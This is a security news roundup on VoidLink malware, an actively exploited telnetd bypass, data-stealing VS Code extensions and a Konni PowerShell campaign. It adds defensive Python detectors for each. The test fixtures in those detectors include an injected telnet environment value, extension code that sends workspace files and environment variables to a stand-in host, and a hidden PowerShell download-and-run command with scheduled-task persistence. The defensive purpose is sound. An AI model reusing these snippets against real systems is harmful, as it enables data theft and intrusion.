AI‑built VoidLink malware emerges with advanced loaders, rootkits and modular attack capabilities
Researchers disclosed a new cloud-focused malware framework dubbed “VoidLink,” which appears to have been developed predominantly with AI assistance and to have reached functional maturity in weeks rather than the months a framework of this scope has typically taken to build.
The framework includes custom loaders, implant modules, rootkit techniques for stealthy persistence, and a set of plugins that extend its capabilities across Linux-based environments, a modular design the researchers observed evolving rapidly.
Evidence of AI involvement, including leaked design documents and source artifacts, points to an emerging class of adversary tooling accelerated by automation, which raises both the speed and the sophistication of attacks.
Active attacks leverage telnetd authentication bypass flaw (CVE‑2026‑24061) to obtain instant root access
Security researchers reported that attackers are actively exploiting a critical authentication bypass in the GNU InetUtils telnetd service (CVE-2026-24061), allowing remote malicious actors to skip authentication and gain root access on affected systems.
The underlying flaw stems from unsanitized handling of environment variables that the client supplies during telnet option negotiation, which lets an attacker steer telnetd into granting root privileges; exploitation attempts against hosts exposing TCP port 23 have been observed in threat telemetry.
Although telnet is legacy, many industrial, embedded and operational systems still expose it for compatibility reasons, so the service remains reachable in enterprise and industrial networks; update to a fixed inetutils build where one is available, and otherwise disable telnetd or restrict port 23 to management networks and migrate to SSH.
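Because the page describes the flaw as unsanitized handling of client-supplied environment variables, the check a defender or a telnetd maintainer wants is a parser for the NEW-ENVIRON option (RFC 1572) that refuses hostile values before they reach the login environment. The following is an added example, not code from this page or from GNU inetutils; it encodes an assumption about which values a hardened server should reject (option-like values beginning with "-", control characters, names outside an allowlist, oversized values), and every byte string in it is constructed for the example.

```python
"""Audit telnet NEW-ENVIRON (RFC 1572) negotiation for hostile env values.

Added example, not code from the page or from GNU inetutils. The rejection
rules are an assumption about what a hardened telnetd should refuse; the
sample traffic is constructed.
"""
import re

IAC, SB, SE = 0xFF, 0xFA, 0xF0          # telnet command bytes (RFC 854)
NEW_ENVIRON = 39                         # option code (RFC 1572)
IS, SEND, INFO = 0, 1, 2                 # suboption commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3    # suboption field markers

ALLOWED_VARS = {"USER", "DISPLAY", "PRINTER", "SYSTEMTYPE", "JOB", "ACCT"}
MAX_VALUE_LEN = 256
OPTION_LIKE = re.compile(r"^\s*-")
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def iter_suboptions(stream: bytes):
    """Yield the unescaped body of every IAC SB ... IAC SE in a telnet stream."""
    i = 0
    while (start := stream.find(bytes([IAC, SB]), i)) >= 0:
        body, j = bytearray(), start + 2
        while j + 1 < len(stream):
            if stream[j] == IAC:
                if stream[j + 1] == SE:
                    break
                if stream[j + 1] != IAC:        # IAC + other command inside SB: malformed
                    return
                j += 1                          # IAC IAC is a literal 0xFF
            body.append(stream[j])
            j += 1
        else:
            return                              # unterminated suboption
        yield bytes(body)
        i = j + 2


def parse_new_environ(body: bytes):
    """Parse a NEW-ENVIRON suboption body into (command, [(kind, name, value)]).

    kind is 'VAR' (well-known name) or 'USERVAR'. Malformed input raises
    ValueError instead of being guessed at, which is what a server should do.
    """
    if len(body) < 2 or body[0] != NEW_ENVIRON or body[1] not in (IS, SEND, INFO):
        raise ValueError("not a well-formed NEW-ENVIRON suboption")
    command = {IS: "IS", SEND: "SEND", INFO: "INFO"}[body[1]]
    entries, current, target = [], None, None
    i = 2
    while i < len(body):
        b = body[i]
        if b in (VAR, USERVAR):
            current = ["VAR" if b == VAR else "USERVAR", bytearray(), bytearray()]
            entries.append(current)
            target = current[1]                 # bytes now go to the name
        elif b == VALUE:
            if current is None:
                raise ValueError("VALUE before any VAR/USERVAR")
            target = current[2]                 # bytes now go to the value
        else:
            if b == ESC:                        # ESC quotes the next byte literally
                i += 1
                if i >= len(body):
                    raise ValueError("dangling ESC")
                b = body[i]
            if target is None:
                raise ValueError("data before any VAR/USERVAR")
            target.append(b)
        i += 1
    return command, [(k, n.decode("ascii", "replace"), v.decode("ascii", "replace"))
                     for k, n, v in entries]


def unsafe_reasons(kind: str, name: str, value: str):
    """Reasons a hardened telnetd should refuse this variable (assumed policy)."""
    reasons = []
    if kind == "VAR" and name.upper() not in ALLOWED_VARS:
        reasons.append("unknown well-known variable")
    if OPTION_LIKE.match(value):
        reasons.append("value begins with '-' (would parse as a command-line option)")
    if CONTROL.search(name) or CONTROL.search(value):
        reasons.append("control character in name or value")
    if len(value) > MAX_VALUE_LEN:
        reasons.append("oversized value")
    return reasons


def audit_stream(stream: bytes):
    """Return [(name, value, reasons)] for every refusable client-supplied variable."""
    findings = []
    for body in iter_suboptions(stream):
        if not body or body[0] != NEW_ENVIRON:
            continue
        command, entries = parse_new_environ(body)
        if command == "SEND":                   # SEND carries no values
            continue
        for kind, name, value in entries:
            reasons = unsafe_reasons(kind, name, value)
            if reasons:
                findings.append((name, value, reasons))
    return findings


def sub(*parts: bytes) -> bytes:
    """Wrap parts in IAC SB NEW-ENVIRON ... IAC SE (constructed test traffic)."""
    return bytes([IAC, SB, NEW_ENVIRON]) + b"".join(parts) + bytes([IAC, SE])


# Constructed samples: a normal login negotiation and a hostile one.
BENIGN = sub(bytes([IS, VAR]), b"USER", bytes([VALUE]), b"alice")
HOSTILE = sub(bytes([IS, VAR]), b"USER", bytes([VALUE]), b"-injected",
              bytes([VAR]), b"DISPLAY", bytes([VALUE]), b"a", bytes([ESC, VALUE]), b"b")

if __name__ == "__main__":
    for label, stream in (("benign", BENIGN), ("hostile", HOSTILE)):
        print(label, audit_stream(stream))
```

The same parser can be pointed at a packet capture of port 23 traffic to see which clients are sending values that would have been passed through, which is useful for scoping exposure while the fleet is being patched.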
Two popular VSCode extensions found stealing source code and metadata from 1.5 million+ users
Two malicious extensions in the Visual Studio Code Marketplace, installed more than 1.5 million times, were found exfiltrating developer data to remote servers without user consent, representing a software supply-chain compromise in widely adopted development tooling.
These extensions posed as AI coding assistants but silently bundled data-stealing modules that collected source code and environment metadata and sent it to China-based infrastructure, a direct risk to intellectual property and to any credentials present in the workspace.
The incident underscores how attackers target trusted ecosystems to evade detection and gain broad, unnoticed access across many development environments, with espionage and data leakage as the likely outcomes.
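The marketplace does not declare what an extension does with workspace contents, so a practical local check is to inventory installed extensions and flag those whose bundled JavaScript both reads workspace files or process.env and opens outbound connections to a literal host. The script below is an added example, not code from this page or from Microsoft; the regexes are a heuristic (an assumption, tune them per organisation), the trusted-host list is a placeholder, and the two extensions it scans are constructed in a temp directory so it runs offline.

```python
"""Triage locally installed VS Code extensions for exfiltration-shaped code.

Added example, not code from the page or from Microsoft. The source/sink
regexes and the trusted-host list are assumptions to tune locally; the sample
extension tree is constructed in a temp directory. Real installs live under
~/.vscode/extensions.
"""
import json
import re
import tempfile
from pathlib import Path

SOURCES = {                                   # where stolen data would come from
    "workspace_read": re.compile(
        r"workspace\.(fs\.readFile|textDocuments|findFiles)|fs\.readFile(Sync)?\("),
    "env_read": re.compile(r"process\.env\b|os\.userInfo\(|os\.hostname\("),
}
SINKS = {                                     # how it would leave the machine
    "http_out": re.compile(
        r"https?\.request\(|\bfetch\(|axios\.(post|get|request)|"
        r"new\s+XMLHttpRequest|new\s+WebSocket\("),
}
LITERAL_HOST = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)
TRUSTED_HOSTS = {"marketplace.visualstudio.com", "api.github.com", "github.com"}  # assumption


def scan_extension(ext_dir: Path) -> dict:
    """Report on one extension directory: manifest identity plus source/sink hits."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    ident = "{}.{}@{}".format(manifest.get("publisher", "?"),
                              manifest.get("name", "?"), manifest.get("version", "?"))
    hits = {k: 0 for k in (*SOURCES, *SINKS)}
    hosts = set()
    for js in ext_dir.rglob("*.js"):
        if "node_modules" in js.parts:
            continue                          # assumption: dependencies reviewed separately
        text = js.read_text(encoding="utf-8", errors="ignore")
        for key, rx in {**SOURCES, **SINKS}.items():
            hits[key] += len(rx.findall(text))
        hosts.update(h.lower() for h in LITERAL_HOST.findall(text))
    untrusted = sorted(h for h in hosts if h not in TRUSTED_HOSTS)
    reads = hits["workspace_read"] + hits["env_read"]
    suspicious = reads > 0 and hits["http_out"] > 0 and bool(untrusted)
    return {"id": ident, "hits": hits, "untrusted_hosts": untrusted, "suspicious": suspicious}


def scan_all(root: Path = None):
    """Scan every extension directory under root (default: the user's VS Code install)."""
    root = root or Path.home() / ".vscode" / "extensions"
    return [scan_extension(d) for d in sorted(root.iterdir())
            if d.is_dir() and (d / "package.json").exists()]


def build_sample_tree() -> Path:
    """Construct two fake extensions for a stand-alone run: one benign, one exfil-shaped."""
    root = Path(tempfile.mkdtemp(prefix="vsix-audit-"))

    def make(name: str, js: str):
        d = root / f"example.{name}-1.0.0"
        d.mkdir()
        (d / "package.json").write_text(json.dumps(
            {"publisher": "example", "name": name, "version": "1.0.0", "main": "./extension.js"}))
        (d / "extension.js").write_text(js)

    make("formatter",
         "const vscode=require('vscode');\n"
         "exports.activate=()=>vscode.commands.registerCommand('fmt',()=>{});\n")
    make("ai-helper",
         "const vscode=require('vscode');const https=require('https');\n"
         "async function leak(){const docs=vscode.workspace.textDocuments.map(d=>d.getText());"
         "const body=JSON.stringify({docs,env:process.env});"
         "https.request('https://collector.example.invalid/upload',{method:'POST'}).end(body);}\n"
         "exports.activate=()=>setInterval(leak,60000);\n")
    return root


if __name__ == "__main__":
    for report in scan_all(build_sample_tree()):
        flag = "SUSPICIOUS" if report["suspicious"] else "ok"
        print(flag, report["id"], report["hits"], report["untrusted_hosts"])
```

Run it against the real extensions directory by calling scan_all() with no argument. A flagged extension is not proof of theft, only a reason to read its code or remove it; the point is that the combination of file or environment reads plus a hard-coded outbound host is the shape the page's incident took.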
Update‑linked boot failures hit Windows 11 24H2 and 25H2 devices, prompting Microsoft review
Microsoft confirmed widespread reports that a subset of Windows 11 devices fail to boot with “UNMOUNTABLE_BOOT_VOLUME” errors after applying the January 2026 security updates, prompting internal investigation as organizations roll out patches.
The issue affects Windows 11 versions 24H2 and 25H2 after installation of the January 2026 cumulative security update, complicating enterprise patch deployment and rollback planning.
Security updates remain essential for reducing exposure to actively exploited vulnerabilities, but the incident shows the operational risk of update-induced outages across large, distributed end-user fleets; staged rollout rings and a tested recovery path limit the blast radius when an update misbehaves.
North Korea’s Konni group deploys AI‑generated PowerShell malware in targeted blockchain attacks
North Korean hacker group Konni (Opal Sleet, TA406) launched a targeted campaign using AI-generated PowerShell malware to compromise blockchain developers and engineers across Asia-Pacific through phishing links hosted on Discord.
The attack chain used a crafted ZIP archive and LNK shortcut that triggered a staged download of an encrypted PowerShell backdoor and established persistence through a scheduled task, showing heavy obfuscation and AI-assisted tooling.
Targeting development environments and infrastructure credentials creates both data-theft and supply-chain risk, since a compromised developer workstation can be used to reach broader organizational environments.
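The chain described above (user-launched LNK, hidden PowerShell, staged download, scheduled-task persistence) is visible in ordinary process-creation telemetry if the stages are correlated by process lineage. The detector below is an added example, not detection content from this page or from any vendor: the input records are constructed here using Sysmon Event ID 1 field names, the GUIDs and paths are placeholders, and the stage patterns are assumptions about how such a chain appears in telemetry, not indicators from the reported campaign.

```python
"""Correlate process-creation events for a LNK -> hidden PowerShell ->
staged download -> scheduled-task chain.

Added example, not the page's or any vendor's detection content. Records are
constructed with Sysmon Event ID 1 field names; stage patterns are assumptions
about how the chain appears in telemetry, not campaign indicators.
"""
import base64
import json
import re
from collections import defaultdict

# -EncodedCommand and its accepted abbreviations, then the base64 payload.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b")
DOWNLOAD = re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
                      r"net\.webclient|start-bitstransfer|\bcurl(?:\.exe)?\b")
SCHTASK = re.compile(r"(?i)schtasks(?:\.exe)?\s.*/create|register-scheduledtask")


def load_jsonl(text: str):
    """Parse one JSON object per line (the shape of a Sysmon/SIEM export)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE base64) or '' if none/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def stages_for(ev: dict) -> set:
    """Tag one event with the chain stages it matches."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    cmd = cmd + " " + decode_encoded_command(cmd)   # inspect the decoded payload too
    tags = set()
    is_ps = image.endswith("powershell.exe") or image.endswith("pwsh.exe")
    # Assumption: a double-clicked LNK runs its target as a child of explorer.exe.
    if is_ps and parent.endswith("explorer.exe") and (HIDDEN.search(cmd) or ENC_FLAG.search(cmd)):
        tags.add("user_launch_hidden")
    if is_ps and DOWNLOAD.search(cmd):
        tags.add("staged_download")
    if SCHTASK.search(cmd) and re.search(r"(?i)powershell|pwsh", cmd):
        tags.add("scheduled_task_persistence")
    return tags


def correlate(events):
    """Group tagged events by the root of their process lineage; alert on >= 2 stages."""
    by_guid = {e["ProcessGuid"]: e for e in events}

    def root_of(guid):
        seen = set()
        while guid not in seen and by_guid.get(guid, {}).get("ParentProcessGuid") in by_guid:
            seen.add(guid)
            guid = by_guid[guid]["ParentProcessGuid"]
        return guid

    chains = defaultdict(set)
    for ev in events:
        tags = stages_for(ev)
        if tags:
            chains[root_of(ev["ProcessGuid"])] |= tags
    return {root: sorted(tags) for root, tags in chains.items() if len(tags) >= 2}


def _enc(ps: str) -> str:
    """Encode a script the way PowerShell -EncodedCommand expects (UTF-16LE base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE1 = r"iwr https://cdn.example.invalid/s1 -OutFile $env:APPDATA\s1.ps1; & $env:APPDATA\s1.ps1"
SAMPLE_EVENTS = [  # constructed records; GUIDs, hosts and paths are placeholders
    {"ProcessGuid": "{P1}", "ParentProcessGuid": "{E1}", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _enc(STAGE1)},
    {"ProcessGuid": "{S1}", "ParentProcessGuid": "{P1}",
     "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": PS,
     "CommandLine": r'schtasks.exe /create /tn Updater /tr "powershell -w hidden -f %APPDATA%\s1.ps1" /sc minute /mo 30 /f'},
    {"ProcessGuid": "{P2}", "ParentProcessGuid": "{E1}", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\build.ps1"},   # benign interactive use
    {"ProcessGuid": "{V1}", "ParentProcessGuid": "{V0}", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for root, tags in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT lineage {root}: {', '.join(tags)}")
```

Decoding -EncodedCommand before matching is what makes the download stage visible; without it the first event looks like any other hidden PowerShell launch. Requiring two stages in one lineage keeps a lone "-w hidden" from paging anyone, while the benign build script in the sample never trips a single rule.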